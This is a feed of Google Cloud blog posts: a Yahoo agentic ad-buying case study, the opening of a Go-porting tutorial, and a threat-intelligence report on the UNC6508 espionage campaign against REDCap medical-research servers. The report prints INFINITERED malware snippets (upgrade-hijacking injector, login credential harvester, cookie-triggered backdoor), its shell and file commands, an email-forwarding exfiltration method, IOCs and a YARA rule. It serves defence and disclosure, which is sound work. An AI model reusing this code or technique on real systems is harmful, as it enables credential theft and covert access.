Now hear this: Podcasts from Google Cloud

Cloud Security Podcast: Deceiving adversaries at scale: Kevin Conley from Riot Games discusses how modern organizations can use deception technology to gain a home-field advantage against adversaries by proactively monitoring their environments. Listen here.
Cloud Security Podcast: Hyperscaling cloud security with Wiz: Yinon Costica, co-founder and VP of product, Wiz, discusses how the company used a product-led approach and a unique security graph model to scale rapidly within the competitive cloud security market. Listen here.
Behind the Binary: When AI features create zero-click exploits: Google Project Zero’s Seth Jenkins joins the podcast to dissect a full two-bug, zero-click exploitation chain targeting the Pixel 9. Listen here.

To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.

Architecting a trusted agentic platform with graph technologies: A Yahoo case study

Mon, 15 Jun 2026 16:00:00 +0000

As enterprises adopt agentic AI, they need to shift from reactive systems of intelligence to proactive systems of action to equip the agents they’re building with the context and performance they need, plus regulator-grade accountability, where every decision is explainable and auditable.

At Google Cloud Next ‘26, we discuss how our Agentic Data Cloud enables a system of action, and Yahoo’s digital media buying platform is a compelling example of this vision. Yahoo partnered with Google Cloud to build its Seller Agent digital media buying platform using Google Data Cloud graph technologies. Seller Agent condenses multi-week manual processes into fully governed, live campaigns that can be executed in just seconds. Ultimately, this agentic platform serves as a powerful blueprint for multiple industries, demonstrating that autonomous systems can operate at remarkable speed while remaining strictly accountable.

"Yahoo's mission is to be a trusted guide through the digital world. In partnership with Google Cloud, we're extending that promise to advertisers: agentic media buying that's fast, transparent, effective, and built to be trusted." - Gabriel DeWitt, Head of Monetization, Yahoo

In this blog, we explore the shift toward agentic AI, examine how Yahoo’s Seller Agent architecture solves for speed and trust in media buying, and show you how to apply this graph-based pattern to build trusted systems of action in your own organization.

Case study: agentic media buying

For years, complex, high-value workflows—like premium digital advertising campaigns—have required weeks of human handoffs, fragmented spreadsheets, and manual analysis. Yahoo recognized that agentic AI could collapse this timeline, allowing agents to plan and execute campaigns in mere seconds. This leap from manual to autonomous execution represents a massive opportunity to reclaim operational efficiency and ensure more of every dollar reaches measurable outcomes.

But simply dropping LLMs into a high-stakes workflow does not solve the problem; an agent attempting to negotiate contracts or ad placements without a deterministic understanding of real-time inventory, pricing rules, and business constraints is prone to hallucinate — potentially resulting in disastrous deals. A trusted agentic platform requires a definitive, real-time source of truth, ensuring it acts on hard facts rather than statistical guesses.

Furthermore, speed and factual grounding are only half the equation. The moment an AI agent starts moving real budgets, it faces scrutiny from regulators who demand instant answers to why specific decisions were made or which policies were applied. Digging through raw system logs after the fact is the wrong control surface for autonomous execution. Real-world systems of action require regulator-grade governance and auditability built directly into the workflow, not bolted on as an afterthought.

The architecture of a trusted system of action

Yahoo's mission has always been to be a trusted guide through the digital world. Agentic media buying extends that promise to advertisers, agencies, publishers, and regulators who entrust Yahoo with their budgets — and expect real accountability. The issue was automating campaign execution in a way that was explainable, governable, and auditable.

To meet this challenge, Yahoo built its Seller Agent as a multi-agent system running on Google Cloud. Buyer requests enter through a planning supervisor agent running on Google Kubernetes Engine (GKE) and orchestrated with Google's Agent Development Kit (ADK). The supervisor decomposes each request into specialized tasks including inventory discovery, audience matching, forecasting, pricing analysis, package recommendation, governance review, and execution. Agents coordinate through the open Agent2Agent (A2A) protocol, while Gemini Enterprise Agent Platform hosts models for embeddings, forecasting, and graph learnings.

But the true breakthrough — what makes autonomous execution both fast and fully transparent — is the platform’s dual-graph foundation. The platform is anchored by two specialized graph systems with an intentional separation of duties: a knowledge graph that’s optimized for acting, and a second context graph for remembering and learning.

"As the industry moves from systems of intelligence to systems of action, the constraint on autonomous AI shifts from model capability to whether a business can trust what an agent does unsupervised. Autonomous systems must record why decisions were made and learn from outcomes. That trust is earned through robust data infrastructure. We built that foundation with Google Data Cloud: a knowledge graph for operational truth in Spanner Graph, a context graph for decision lineage in BigQuery Graph — the blueprint for enterprise-scale agentic platforms." - Swapnil Patel, Senior Director and Head of Monetization Engineering, Yahoo

The knowledge graph: Grounding agents in business reality

Powered by Spanner Graph, Yahoo’s knowledge graph represents its monetization business as a connected operational model, grounding every agent decision in business reality. It models advertising products, placements, audience segments, inventory, contracts, and governance controls as first-class entities and relationships. Crucially, policies live directly within the graph as versioned relationships rather than being buried in application logic. This design allows the system to evaluate products, contractual obligations, consent requirements, and regulatory constraints together in a single, unified graph traversal.

The graph acts as a semantic contract across the agentic platform. During campaign evaluation, an agent can navigate from initial buyer requirements to eligible audiences and governing policies within a single query plan. Gemini Enterprise Agent Platform embeddings enrich these entities with semantic similarity, while graph neural networks contribute inferred relationships. Ultimately, this allows agents to do more than just retrieve available inventory — they understand exactly why it is relevant and help ensure it satisfies all governing constraints.

Yahoo’s knowledge graph ontology, aligned with industry standards like IAB AdCOM

The context graph: creating an auditable memory

Execution at agent-scale is only safe if it is entirely transparent — which is the core function of the context graph. Every time the Seller Agent takes an action, that exact operational span is captured by the BigQuery Agent Analytics plugin. In addition to logging the raw events, the system shapes this evidence into a typed, queryable context graph using BigQuery Agent Analytics SDK utilizing Yahoo's decision-trace ontology, stored in BigQuery Graph.

Consequently, every decision point, candidate package, policy evaluation, specialist-agent delegation, and execution outcome becomes a connected graph of evidence. Because this trace is structured as a typed graph, explaining the agent’s decision making process becomes a simple query. An auditor can instantly trace a decision from the originating campaign brief through every score that’s assigned and policy that’s applied. This transforms autonomous behavior from an opaque process into a fully transparent and continuously improving record of decision-making, helping to ensure absolute accountability.

Yahoo’s context graph ontology

From human to agent scale

For a concrete example of the architecture in action, consider an ad campaign run. What traditionally required weeks of coordination across planning, sales, operations, and compliance can now be completed in seconds through two simultaneous processes.

Acting via the knowledge graph. This pipeline moves the budget, navigating linearly from the buyer's request to a live campaign ground on the knowledge graph. This proceeds in four steps:

Submitting the brief: A buyer agent submits a campaign brief over Ad Context Protocol (AdCP) that describes the desired audience, budget, geography, and business objective.
Knowledge retrieval: The Seller Agent queries the knowledge graph to identify relevant inventory, audiences, contractual availability, historical performance, and governing policies.
Evaluation and scoring: The agent evaluates these factors together to assemble a package of media buying candidates. Forecasting models score the opportunities, while a governance agent independently reviews consent, brand safety, and regulatory constraints.
Approval and execution: The package is either approved automatically under policy thresholds or escalated for human review. Once approved, the media buy is executed and activated.

Auditing and learning via the context graph. While the execution pipeline moves forward, this parallel loop continuously captures the system's reasoning in the context graph, helping to ensure transparency and improve future cycles. This offers the following capabilities:

Continuous capture: Every candidate considered, score assigned, policy applied, and governance decision becomes a connected record in the context graph, linked to the originating campaign session.
Closed-loop learning: As delivery, attribution, and outcome signals arrive, they are joined back to the decisions that produced them, creating the training data that improves future recommendations.
Instant explainability: If an advertiser asks why a particular package was selected or which policies influenced the outcome, the answer is preserved in the context graph and reachable through a single query.

The result is a platform where knowledge, decision-making, governance, measurement, and learning operate together — allowing autonomous media buying to remain explainable, auditable, and continuously improving.

A blueprint for many industries

The era of AI as a mere advisor is ending. Enterprises are demanding systems of action — autonomous agents capable of executing complex, multi-step workflows. But in regulated sectors, the speed that AI brings to the table turns into a liability if you cannot prove how a decision was made. The primary barrier to autonomous execution is no longer intelligence; it is trust.

The architecture that Yahoo and Google Cloud built provides a broadly applicable blueprint with which to solve this. While designed to fix the bottlenecks of digital media buying, the underlying pattern applies to any industry managing high-stakes decisions — from financial trading to supply chain logistics. To operate at agent speed but still maintain human oversight, enterprises must adopt a new architectural baseline that:

Grounds decisions in business reality: Agents cannot rely on probabilistic models alone. They must be grounded by a knowledge graph that deterministically maps your business logic, active contracts, and compliance rules.
Builds an auditable memory: You cannot govern what you cannot trace. Every agentic action must be captured in a context graph, creating an immutable, queryable record of exactly why a decision was made and which alternatives were rejected.
Embraces open interoperability: Trust requires transparency. By building on open protocols and provenance standards, industries can establish a common, auditable language for agentic behavior.

As foundational models become commoditized, enterprises’ competitive advantages are shifting. Long term, your moat will not be the language model you deploy, but the proprietary graph of your business operations and governed history. Likewise, the future of enterprise AI isn’t simply systems that can act, but systems that can explain, govern, and take accountability for those actions.

Get started today

Ready to build your own trusted system of action? Start by exploring Spanner Graph to ground your agentic workflows in business reality. Next, use BigQuery Graph to build an auditable memory that powers closed-loop learning and regulator-grade explainability. You can begin capturing and analyzing these operational traces today using the BigQuery Agent Analytics Plugin and SDK. Finally, review the Ad Context Protocol to understand the open communication standards underpinning Yahoo’s agentic platform.

Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research

Mon, 15 Jun 2026 14:00:00 +0000

Written by: Patrick Whitsell, John McGuiness

Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting institutions in the North American academic, medical, and military research community. While remaining undetected for over a year, the threat actor compromised externally facing web applications, deployed bespoke malware, pivoted to sensitive internal systems, and abused enterprise administrative tools for covert data exfiltration. The threat actor had broad collection aspirations, including sensitive defense intelligence related to national security, Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, cyber offensive programs, and medical research.

GTIG disrupted the malicious infrastructure associated with this threat actor. Working with Mandiant Consulting, we notified the affected organizations upon detection and offered our assistance with remediation. We have updated Google Security Operations (SecOps) with relevant intelligence, enabling defenders to identify indicators of compromise (IOCs) within their networks. We encourage all users and customers to follow recommended best practices for third-party Identity Providers (IdP) and ensure 2-Step Verification (2SV) is enabled across all accounts.

Campaign Overview

The campaign targeted a diverse set of national, state, and private medical entities. These organizations comprise world-renowned clinical providers, premier academic centers, North American military health institutions, professional advocacy groups, and health regulatory bodies. Their research areas span a broad spectrum of modern medicine, from molecular discovery and clinical drug trials to state-level public health policy and military readiness. They employ thousands of people with a combined research budget in the billions of dollars.

The earliest known compromise occurred in September 2023, after which GTIG observed a consistent operational pattern. The threat actor exploited externally facing REDCap (Research Electronic Data Capture) servers and deployed custom malware named INFINITERED to capture legitimate REDCap login credentials. Then, after remaining undetected for more than a year, UNC6508 used the captured credentials to access the victim’s internal network. The threat actor was also observed using the novel technique of manipulating domain content compliance rules for data exfiltration. Lastly, UNC6508 used sophisticated operations security (OpSec) techniques to conceal and obfuscate their activity.

GTIG collaborated closely with Mandiant Consulting, the FLARE team, and Workspace Security on this effort to combine our threat intelligence, incident response, and reverse engineering expertise across Google Cloud. This enabled us to develop a complete picture of the attack lifecycle from initial compromise to complete mission. GTIG also extends thanks to the affected organizations for their cooperation and the valuable post-exploitation insights they shared.

Prevention, Detection, and Remediation

GTIG recommends defenders implement the following security measures, across all Cloud enterprise platforms, to mitigate this threat:

Secure Admin Accounts: Enforce phishing-resistant 2-Step Verification (2SV) for enterprise administrator accounts, including through third-party Identity Providers.
Advanced Protection: Consider enrolling highly sensitive accounts in our Advanced Protection Program for additional safeguards against malware and phishing attacks.
Prevent Cookie Theft: Enforce Device Bound Session Credentials (DBSC) with CAA for highly sensitive accounts on Windows devices to prevent session hijacking.
Monitor Audit Logs: Enable Audit logs to analyze, monitor, and alert on changes to your data.
Control Data: Define Data Loss Prevention (DLP) rules to block or alert on external sharing of sensitive data.
Audit Compliance Rules: Review Admin audit logs and content compliance rules for unauthorized modifications.
SIEM Coverage: Consider using Google Security Operations (SecOps) and ensure Workspace logs are included in your Security Information and Event Management (SIEM) pipeline.
Password Protection: Use Chrome Enterprise Password Leak Detection to alert when potentially compromised password use is detected.
Patch REDCap: Fully updated REDCap installations to the latest software version and ensure older versions are completely removed.
Monitor for INFINITERED: Scan REDCap servers for the presence of INFINITERED using the provided YARA rule and IOCs.

Medical Research University Compromise

In September 2023, a REDCap server belonging to a North American medical research institution was compromised. Continuing activity was observed through November 2025. During this time period, UNC6508 carried out the following attack chain.

Exploit the REDCap server.
After three months, deploy the INFINITERED malware.
INFINITERED stealthily records credentials, and persists through upgrades, for more than a year.
Pivot to a domain admin account.
Add the malicious content compliance rule.
Silently “BCC-forward” matched emails to a threat actor-controlled account.

Figure 1: Campaign attack flow diagram

Initial Access: REDCap Exploitation and INFINITERED

UNC6508 consistently targets REDCap servers. REDCap is a web-based software platform designed specifically for building and managing online databases and surveys, in compliance with regulations for medical and scientific research. It is a commonly used platform in the North American medical research community.

GTIG was not able to confirm how UNC6508 initially gained access to the REDCap server. By design, REDCap allows administrators to continue running legacy software side-by-side with the current version. UNC6508 was observed probing for these vulnerable legacy versions on several target organizations’ REDCap systems. This highlights not only the increasing importance of rapidly applying security patches, but also promptly removing older software versions to prevent downgrade attacks.

Upon establishing a foothold on the REDCap server, UNC6508 performed internal reconnaissance and credential discovery to obtain database and service account credentials. The threat actor also deployed a web shell named "help.php", which maintained persistence and functioned as an uploader in the REDCap application.

INFINITERED Analysis

Three months after the initial compromise, UNC6508 deployed a custom malware payload tracked as INFINITERED. This malware implements its functionality across three distinct modular components by trojanizing legitimate REDCap system files.

Dropper and Upgrade Interception
Credential Harvester
Backdoor, with command and control (C2)

GTIG discovered multiple organizations across the US and Canada compromised with INFINITERED. All of these organizations were promptly notified of the compromise upon detection and offered our assistance with remediation.

Figure 2: INFINITERED diagram

Dropper and Upgrade Interception

To maintain persistent remote access, INFINITERED injects its code into new REDCap versions by intercepting the upgrade process. This capability is embedded into the legitimate REDCap upgrade system file. INFINITERED performs this code injection following these steps.

Read the current software version, which includes the INFINITERED code.
Extract the malicious logic using GUID delimiter b49e334d-9c01-463e-9bc5-00a6920fb66e.
Inject backdoor code into the custom hooks configuration file.
Inject credential harvester code into the authentication system file.
Inject the extracted code from step 2 into the upgrade system file.

In Elastic Beanstalk environments, INFINTERED performs additional steps to ensure persistence in cloud deployments.

// b49e334d-9c01-463e-9bc5-00a6920fb66e
...
$file_upgrade = $base_path."Upgrade.php"; 
$file_content_upgrade = $zip->getFromName($file_upgrade); // new upgrade file content
$file_content_upgrade_local = file_get_contents(__FILE__); // Contents of the current file 
...
if ($file_content_upgrade !== false) {
    // Base64 GUID delimiter
    $dummy_marker = base64_decode('YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl');
    $pattern = "/$dummy_marker(.*?)$dummy_marker/s";
    if (preg_match($pattern, $file_content_upgrade_local, $matches)) {
        $extracted_text = $matches[0];
        $search_content = "// If running on AWS Elastic Beanstalk"; 
        $upgrade_decode = "// ".$extracted_text."\r\n\t\t".$search_content;
        $new_content = str_replace($search_content, $upgrade_decode, $file_content_upgrade);
        $zip->deleteName($file_upgrade);
        $zip->addFromString($file_upgrade, $new_content);
    }
}
$zip->close();
...
// b49e334d-9c01-463e-9bc5-00a6920fb66e

Code Snippet 1: Intercept upgrades and inject INFINITERED code

Credential Harvester

INFINITERED injects a credential harvester into the authentication system file to compromise user accounts. This component of the malware captures usernames and passwords submitted via POST requests during the login process. The credentials are encrypted using the environment’s default encryption routine and hidden inside a local REDCap sessions database table with the string “xc32038474a” prefixed to the Session ID.

$currentUTC = gmdate('Y-m-d H:i:s');
$str = encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);
include dirname(__FILE__, 3) . DIRECTORY_SEPARATOR . 'redcap_connect.php';
$expiration_timestamp = strtotime("+60 days", strtotime($currentUTC));
$session_id = 'xc32038474a'.substr(bin2hex($currentUTC), -20);
$session_sql = "INSERT INTO [REDACTED] ([REDACTED],[REDACTED],[REDACTED]) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))";
@$rc_connection->query($session_sql);

Code Snippet 2: Hide credentials in a legitimate database table

Backdoor

INFINITERED also has backdoor functionality it establishes in the custom hooks system file inside the update package, specifically within a function that executes on every REDCap page load. This global hook ensures the backdoor runs on every page load. INFINITERED looks for a specific HTTP Cookie parameter named "REDCAP-TOKEN" and a cookie value starting with a specific plaintext string. If these conditions are present, the malware strips the prefix and decrypts the remaining payload with the environment's default decryption routine.

$cookieValue = $_COOKIE['REDCAP-TOKEN'];
if ($cookieValue) {
    $magic_flag = '[REDACTED]'; // Cookie prefix
    ...
    // Decrypt message if cookie prefix is found
    $key = '[REDACTED]';
    $req_data = substr($cookieValue, strlen($magic_flag));
    $req_data = decrypt($req_data, $key);

Code Snippet 3: Decrypting commands to INFINITERED

If the decrypted payload is empty, the malware acts as a beacon, returning system details such as the OS, PHP version, working directory, and database credentials including the hostname, username, password, and salt. When non-empty, the malware will parse the payload for command tags, which the threat actor can use to execute shell commands, run raw SQL queries, and transfer files.

Supported Commands

INFINITERED is capable of executing the following commands.

Command Tag	Description
`00`	`Executes arbitrary system commands using shell_exec.`
`02`	`Uploads a file to the server. The payload contains the destination path and file content.`
`03`	`Retrieves stolen credentials stored in the legitimate database table.`
`04`	`Deletes the stolen credential records from the legitimate database table.`
`05`	`Executes arbitrary SQL queries against the database and returns the results.`
`ej671a16i7fd8202nu6ltfg5p6x7u`	`Downloads an arbitrary file from the server. The payload following this tag specifies the full filesystem path of the target file.`
`Empty Payload`	`Beacons system information, database credentials, and configuration details.`

Table 1: Supported commands for INFINITERED

Domain Content Compliance Rule Abuse

More than a year after the initial compromise, UNC6508 used overlapping credentials, harvested from REDCap, to access an administrator account. This underscores the challenge and importance of securing systems holistically. Defenders should enable 2-Step Verification (2SV) and ensure unique credentials are used across different security domains to mitigate credential replay attacks.

UNC6508 then leveraged content compliance rules, a legitimate feature present in many cloud-based enterprise productivity suites, to exfiltrate specific email communications. Administrators can create these rules to manage email messages that contain content matching predefined sets of words, phrases, text patterns, or numerical patterns. By default, compliance rules apply to all users in an organizational unit. The use of compliance rules for data exfiltration is a novel technique not previously observed with PRC-nexus threat actors.

Specifically, UNC6508 created a compliance rule named "Patroit" [sic] that used regular expressions to match on keyword and email address patterns in sent or received emails. Matches were silently BCC-forwarded to a threat actor-controlled Gmail address, BebitaBarefoot774[@]gmail[.]com, providing a covert and continuous stream of exfiltrated data. Upon discovery, GTIG disabled the Gmail account to prevent further data exfiltration.

Figure 3: Targeted intelligence collection categories

The patterns used in the “Patroit” compliance rule suggest strategic intelligence collection targeting geo-strategic policy, military strategy, advanced technology, and medical research. The patterns also include professional email addresses and phone numbers for members of organizations in these spaces. Several of the terms applied have spelling errors, suggesting the list was manually maintained.

This ambitious scope of intelligence collection from UNC6508 may suggest a broader range of targets beyond the identified victims in the medical research community. GTIG assesses these collection priorities are aligned with the strategic interests of the People's Republic of China.

While most of the terms relate to defense and technology, the terms including medical research facilities, and the specific pathogen “Chikungunya,” stand out from the others. Chikungunya is a viral disease transmitted to humans from mosquitos and was responsible for an outbreak in China's Guangdong province beginning in July 2025.

Operations Security (OpSec)

GTIG observed UNC6508 use sophisticated and meticulous OpSec techniques to conceal their activities from defenders.

Figure 4: UNC6508 operations security techniques

UNC6508 relied heavily on Obfuscation (OBF) networks. This strategy, now frequently employed by PRC-nexus actors, involves routing traffic from offensive operations through a mix of compromised routers, residential proxies, Virtual Private Servers (VPS), and other devices.

This operation used exclusively US-based OBF network IP addresses to access both the "BebitaBarefoot774[@]gmail[.]com" account and when replaying legitimate credentials to access the compromised enterprise administrator account. Additional OpSec techniques were also used, such as obtaining the threat actor-controlled Gmail account through a mass creation service and dedicating it exclusively to email data exfiltration.

By maintaining a high level of OpSec, UNC6508 significantly complicates the efforts of defenders to identify malicious patterns, establish accurate attribution, and map the threat actor’s infrastructure.

Attribution

GTIG attributes this activity to UNC6508 with high confidence. This assessment is based on infrastructure overlaps between campaigns, the consistent use of the INFINITERED backdoor on REDCap servers, and the specific targeting of medical research and defense sectors. We assess UNC6508 is an espionage motivated threat cluster, with priorities that align with historic PRC state-sponsored espionage trends and intelligence collection requirements.

Indicators of Compromise (IOCs)

To assist the wider community, we have also included a list of indicators in a GTI Collection for registered users.

Network Indicators

Indicator	Type	Context
BebitaBarefoot774@gmail.com	Email	Email exfiltration account
23.169.65.49	IP	Source of admin login (Compromised ASUS router)

File Indicators

Description	SHA256
Persistence (help.php)	ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7
Credential Harvester	db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136
Credential Harvester	c1ac43d23f89d41eb4ff131678ab562ab2cfed9aa334b13767ef141d303b0e5b
Backdoor	8f0158855a656b629ca76ebca565f18bc25563ded34b65d6771632c20edb68ec
Backdoor	51a57bfc9ed3eb6451c1c289607814d59e1698c666fb97ac5f694c398f23d045
Dropper	4efbef69eb3b09bacff892d6a55778d07c418e7f15eba3cf1245e8cdfd8dda0b
Dropper	58bb25777e0aa86bcd2125101e0bca4e8732b03d91bd8d2f205b446a2a8d5c86

Host Indicators

Indicator	Description
b49e334d-9c01-463e-9bc5-00a6920fb66e	INFINITERED current software version GUID delimiter
xc32038474a	INFINITERED Redcap database session ID prefix

MITRE ATT&CK Mapping

Tactic	Technique ID	Technique Name	Context/Activity
Initial Access	T1190	Exploit Public-Facing Application	Exploitation of REDCap survey management servers.
Persistence	T1505.003	Server Software Component: Web Shell	Deployment of INFINITERED and uploaders.
	T1554	Compromise Client Software Binary	Modification of REDCap to intercept updates.
Defense Evasion	T1027	Obfuscated Files or Information	Use of Base64 encoding for malicious payloads within PHP files.
	T1090.003	Proxy: Multi-hop Proxy	Routing traffic through compromised IoT devices (OBF networks).
	T1562.001	Impair Defenses: Disable or Modify Tools	Creating "silent" BCC rules to avoid user detection.
	T1689	Downgrade Attack	Exploiting vulnerable legacy versions of REDCap.
Credential Access	T1555	Credentials from Password Stores	Accessing local configuration files.
	T1056.003	Input Capture: Web Portal Capture	INFINITERED harvesting plaintext credentials from POST login requests.
Collection	T1114.003	Email Collection: Email Forwarding Rule	Use of content compliance rules ("Patroit") for automated exfiltration.
	T1213	Data from Information Repositories	Searching storage and email for strategic keywords.
Command and Control	T1071.001	Application Layer Protocol: Web Protocols	C2 communication via HTTP Cookie parameters (REDCAP-TOKEN).
Exfiltration	T1567	Exfiltration Over Web Service	Silently forwarding sensitive data to actor-controlled Gmail addresses.
	T1071.001	Application Layer Protocol: Web Protocols	HTTP response to C2 commands

Detections

YARA Rules

rule G_Backdoor_INFINITERED_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$magic_flag = "ej671a16i7fd8202nu6ltfg5p6x7u"
		$magic_flag_base64 = "ej671a16i7fd8202nu6ltfg5p6x7u" base64
		$marker = "b49e334d-9c01-463e-9bc5-00a6920fb66e"
		$marker_base64 = "YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl"
		$s1 = "substr($cookieValue, strlen($magic_flag));"
		$s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']"
		$s3 = "'data' => encrypt($data, $key)"
		$s4 = "$data = shell_exec($command);"
		$s5 = "move_uploaded_file($tmpPath, $fileName)"
		$s6 = "$data = implode('|', $fields)"
		$b_s1 = "substr($cookieValue, strlen($magic_flag));" base64
		$b_s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']" base64
		$b_s3 = "'data' => encrypt($data, $key)" base64
		$b_s4 = "$data = shell_exec($command);" base64
		$b_s5 = "move_uploaded_file($tmpPath, $fileName)" base64
		$b_s6 = "$data = implode('|', $fields)" base64
		$t1 = "(isset($_POST['username']) && $_POST['password'])"
		$t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))"
		$t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);"
		$t4 = "redcap_connect.php"
		$b_t1 = "(isset($_POST['username']) && $_POST['password'])" base64
		$b_t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))" base64
		$b_t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);" base64
		$b_t4 = "redcap_connect.php" base64
		$u1 = "$zip->open($filename) === TRUE)"
		$u2 = "$hooks_encode ="
		$u3 = "$auth_encode ="
		$u4 = "$file_content_hooks = $zip->getFromName($file_hooks);"
		$u5 = "$file_content_auth = $zip->getFromName($file_auth);"
		$u6 = "$file_content_upgrade = $zip->getFromName($file_upgrade);"
		$u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);"
		$u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);"
		$u9 = "str_replace($search_content, $auth_decode, $file_content_auth);"
		$b_u1 = "$zip->open($filename) === TRUE)" base64
		$b_u2 = "$hooks_encode =" base64
		$b_u3 = "$auth_encode =" base64
		$b_u4 = "$file_content_hooks = $zip->getFromName($file_hooks);" base64
		$b_u5 = "$file_content_auth = $zip->getFromName($file_auth);" base64
		$b_u6 = "$file_content_upgrade = $zip->getFromName($file_upgrade);" base64
		$b_u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);" base64
		$b_u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);" base64
		$b_u9 = "str_replace($search_content, $auth_decode, $file_content_auth);" base64
		$filemarker = "<?php"
	condition:
		filesize < 1MB and $filemarker in (0 .. 128) and (((any of ($magic*) or any of ($marker*)) and (any of ($s*) or any of ($t*) or any of ($u*))) or 4 of ($s*) or 4 of ($b_s*) or all of ($t*) or all of ($b_t*) or 6 of ($u*) or 6 of ($b_u*))
}

How I learned Go in a Day with Antigravity 2.0 and How You Can Do the Same

Mon, 15 Jun 2026 09:29:00 +0000

I have been exploring how to reclaim my software stack from NPM dependency overhead and replace my resource-intensive Node.js runtime with a compiled, single-binary Go CLI. The result of my efforts is skl, a fast tool we use for managing Agent Skills, that launches in 2ms and uses only 11MB of memory.

But how exactly did I do it?

Simply, I set the architectural goals and audited the logic, while Antigravity handled the mechanical work of code translation, test generation, and platform path mappings for us. This post describes the step-by-step walkthrough of our migration workflow to help you build yours.

Step 0: Seed personal learning goals

Before writing any code, you start by defining the boundaries of your project. In our case, I wanted a zero-dependency core that used minimal external packages. I decided that our CLI tool needs to be fast, and our security model had to be zero-trust wherever appropriate. In the process, my agent added specific constraints: sanitizing all of our inputs, blocking path traversals, and enforcing depth limits on our folder scans to prevent CPU hangs.

I began by prompting Gemini to audit alternative stacks and help us weigh their tradeoffs.

code_block: <ListValue: [StructValue([('code', 'Research online and identify 3-5 CLI tool building alternatives to use over TS and explain why (focus on performance and security) with specific example and links'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35fb1c0>)])]>

Here are some alternatives we considered:

Rust was exceptionally performant, but navigating its borrow checker rules and managing its lifetime annotations added too much friction for our simple symlinking tool.
If you choose Python, you will have to distribute a runtime interpreter and manage virtual environments, dragging in packaging overhead via pip that we wanted to avoid.
Zig offered excellent low-level memory controls and compiling speed, but it lacked high-level standard library abstractions for HTTP operations and archive extraction out of the box.
Compiled Swift provided clean scripting on macOS, but its cross-platform compilation capabilities for Windows and Linux were less suited for our multi-platform requirements.

For us, Go struck the right balance: it gave us synchronous, linear code, instant compiling, and a rich standard library.

To ensure I was not doing the same work that someone had already completed before me, I kicked off the project by asking directly:

code_block: <ListValue: [StructValue([('code', 'I want to port the `npx skills` to go. Did anyone do this before?'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35fb9a0>)])]>

The agent researched the web and verified that there was no official Go port of the vercel-labs/skills repository. It confirmed that while the official CLI is TypeScript-based and distributed via npm, the Agent Skills specification itself is open and language-agnostic. This meant we were free to build a compiled Go port from scratch.

And since I want to learn in the process, I also asked for Go-specific tips, tricks, and traps:

code_block: <ListValue: [StructValue([('code', 'Identify 3-5 patterns on how to / how NOT to use GO and explain them to me'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35fb130>)])]>

Step 1: It's about Skills

To make best use of best practices in a language that I'm not familiar with, I decided to find the most popular, well-received Agent Skill (instructions that guide AI coding assistants) and install it before we write any code or even start planning. Grounding the environment first ensures that any code written or planned subsequently conforms to the community's consensus style.

Skill search prompt

I asked the agent what community agent skills were available for Go:

code_block: <ListValue: [StructValue([('code', 'what are the top community agent skills for `go`?'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35fb9d0>)])]>

Once the agent suggested samber/cc-skills-golang, I directed it to install the skill pack:

code_block: <ListValue: [StructValue([('code', 'add all skills from samber/cc-skills-golang'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35fb7f0>)])]>

Once installed, I manually verified that the skill was discovered and ready by typing /golang- to invoke autocompletion.

Step 2: Gap analysis and planning

I initialized the architectural goals by providing the agent with the following instruction:

code_block: <ListValue: [StructValue([('code', 'Plan 100% functionality port of `npx skills` to Go, focusing on safety, best practices, and with 90% unit test coverage. Pull the repo and map things out. Ask me any questions.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35fb5e0>)])]>

Our first topic task was the dynamic onboarding flow. When asked what the default should be, I suggested prompting to install antigravity-cli if no agent is found. I also defined the fallback behavior to the universal directory when multiple active agents are detected:

code_block: <ListValue: [StructValue([('code', "For the MVP, we target Antigravity 2 support as default and fallback to universal through the standards-compliant '.agents' directory (if multiple agents detected)."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee34d3af0>)])]>

Implementation

After I approved the Plan, Antigravity handled the systematic conversion of all 51+ agent configuration records (even though I didn't explicitly ask for all this, the AI correctly identified the task as simple enough to just include in the MVP scope), mapping distinct directories for Aider, Claude Code, Cursor, Zed, and others from TypeScript to Go, ensuring we fully covered all environments.

The core structures are conveniently located in one file types.go:

code_block: <ListValue: [StructValue([('code', 'type AgentType string\r\n\r\ntype AgentConfig struct {\r\n\tName string\r\n\tDisplayName string\r\n\tSkillsDir string\r\n\tGlobalSkillsDir string\r\n\tShowInUniversalList bool\r\n\tDetectInstalled func(home, configHome, cwd string) bool\r\n}\r\n\r\n...'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee34d33a0>)])]>

